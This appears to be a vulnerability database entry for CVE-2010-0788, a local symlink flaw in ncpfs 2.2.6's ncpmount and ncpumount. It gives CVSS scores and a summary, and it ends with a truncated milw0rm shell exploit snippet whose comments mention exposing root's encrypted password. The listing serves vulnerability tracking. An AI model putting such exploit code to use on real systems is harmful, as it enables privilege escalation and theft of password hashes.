4.4
CVSSv2

CVE-2010-0788

Published: 02/03/2010 Updated: 10/10/2018
CVSS v2 Base Score: 4.4 | Impact Score: 6.4 | Exploitability Score: 3.4
VMScore: 445
Vector: AV:L/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

ncpfs 2.2.6 allows local users to cause a denial of service, obtain sensitive information, or possibly gain privileges via symlink attacks involving the (1) ncpmount and (2) ncpumount programs.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

ncpfs ncpfs 2.2.6

Exploits

#!/bin/sh ## Had to remove local -r to get it to work via sh on my box ## Root's encrypted password was in toupper form but the ## super stated it worked fine for him (Gentoo with ncpfs 225) ## If it worked for you send an email to info@milw0rmcom /str0ke (echo 'head1 by super' echo -e '==============\n' (function head1(){ (local -r MNTDI ...